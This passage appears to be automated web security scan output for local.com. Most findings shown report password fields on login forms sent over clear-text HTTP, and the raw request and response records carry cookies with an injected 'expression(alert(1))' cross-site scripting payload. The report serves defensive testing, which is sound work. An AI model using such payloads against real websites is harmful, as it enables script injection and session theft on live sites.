anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Cteonnt-Length: 116910
Vary: Accept-Encoding
Date: Thu, 03 Feb 2011 16:01:00 GMT
Connection: close
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186605902360; domain=local.com; expires=Thu, 03-Feb-2011 16:31:00 GMT; path=/
Content-Length: 116910

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.13. http://www.local.com/business/details/map/dallas-tx/amegy-bank-97648000/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/amegy-bank-97648000/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/amegy-bank-97648000/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39485
Date: Thu, 03 Feb 2011 16:38:19 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:38:18 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39485

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Amegy Bank in Dallas, TX - (
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.14. http://www.local.com/business/details/map/dallas-tx/cet-products-liquidators-9985416/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/cet-products-liquidators-9985416/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/cet-products-liquidators-9985416/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 40029
Date: Thu, 03 Feb 2011 16:37:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:23 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Cet+Products+%26+Liquidators|Dallas%2c+TX|Appraisal+And+Liquidation+Services|11134700|9985416~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 40029

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Cet Products & Liquidators in
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.15. http://www.local.com/business/details/map/dallas-tx/equity-bank-63975058/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/equity-bank-63975058/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/equity-bank-63975058/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39437
Date: Thu, 03 Feb 2011 16:37:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:36 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39437

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Equity Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.16. http://www.local.com/business/details/map/dallas-tx/hillcrest-bank-104826937/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/hillcrest-bank-104826937/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/hillcrest-bank-104826937/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39591
Date: Thu, 03 Feb 2011 16:37:39 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Hillcrest+Bank|Dallas%2c+TX|Retail+Banks|15020100|104826937~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39591

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Hillcrest Bank in Dallas, TX
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.17. http://www.local.com/business/details/map/dallas-tx/sterling-bank-16856575/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/details/map/dallas-tx/sterling-bank-16856575/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/details/map/dallas-tx/sterling-bank-16856575/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 39493
Date: Thu, 03 Feb 2011 16:37:51 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:37:50 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Sterling+Bank|Dallas%2c+TX|Retail+Banks|15020100|16856575~Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 39493

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Sterling Bank in Dallas, TX -
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.18. http://www.local.com/business/results/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /business/results/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /business/results/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 132916
Date: Thu, 03 Feb 2011 16:40:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:39:59 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fbusiness%2fresults%2f~Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/
Content-Length: 132916

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title>Dallas, TX banks | Find banks
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.19. http://www.local.com/contact.aspx  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /contact.aspx

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /contact.aspx HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; __utma=177062200.66342387.1296748820.1296748820.1296748820.1; SiteLifeHost=SJL01WSITELCL01proddmlocal; localuserid=5abc3b67-eaa3-419d-81c2-41a43cc0eb62; __utmc=177062200; ASP.NET_SessionId=asnxtpi5da2ya3454rhwd045; __utmb=177062200.8.10.1296748820; __qca=P0-30084348-1296748820628;

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
ntCoent-Length: 27733
Date: Thu, 03 Feb 2011 16:53:38 GMT
Content-Length: 27733
Connection: close
Set-Cookie: localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; domain=www.local.com; expires=Wed, 02-Feb-2011 16:53:38 GMT; path=/
Set-Cookie: localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; domain=local.com; expires=Sat, 05-Mar-2011 15:56:17 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html lang="en-us">
<head>
<title></title>

<
...[SNIP]...
</p>

               <form id="login-form">
                   <label class="cap">
...[SNIP]...
<br />
                   <input class="txt mB5 inputBody" name="password" id="input-password" type="password" />
                   <input class="fl mR10" name="remember" type="checkbox" value="remember" />
...[SNIP]...

7.20. http://www.local.com/coupons/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.local.com
Path:   /coupons/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /coupons/ HTTP/1.1
Host: www.local.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: BIGipServercommunity.local.pluck.com.sitelife-80=596379914.20480.0000; k_visit=1; localcom_s=cid=506c80ba"style="x:expression(alert(1))"45503434253&exp=634323186610440428; __utmz=177062200.1296748820.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; s_sq=%5B%5BB%5D%5D; campid=506; ym_pop_freq1421534=1; ym_pop_freq_expiration1421534=Fri, 04 Feb 2011 16:01:44 GMT; localcom=cid=506c80ba"style="x:expression(alert(1))"45503434253&loc=Dallas%2c+TX&kw=banks&uid=d009f800-6f90-4b2f-8cde-a98446d8c45c&expdate=634349085777121350&bc=Results+for+banks+in+Dallas%2c+TX|serp|%2fresults.aspx%3fkeyword%3dbanks%26cid%3d506c80ba%22style%253d%22x%253aexpression(alert(1))%2245503434253%26client%3dca-dp-r-mark03_3ph_js&rs=banks|Dallas%2c+TX!~Dallas%2c+TX&rp=Amegy+Bank|Dallas%2c+TX|Retail+Banks|15020100|97648000~Equity+Bank|Dallas%2c+TX|Retail+Banks|15020100|63975058; anonId=101d4217-dda7-4536-8a17-9bdfc4b5b95f; s_cc=true; s_vi=[CS]v1|26A56884851D1175-60000145004A830C[CE]; s_nr=1296748831212; session_start_time=1296748820317; 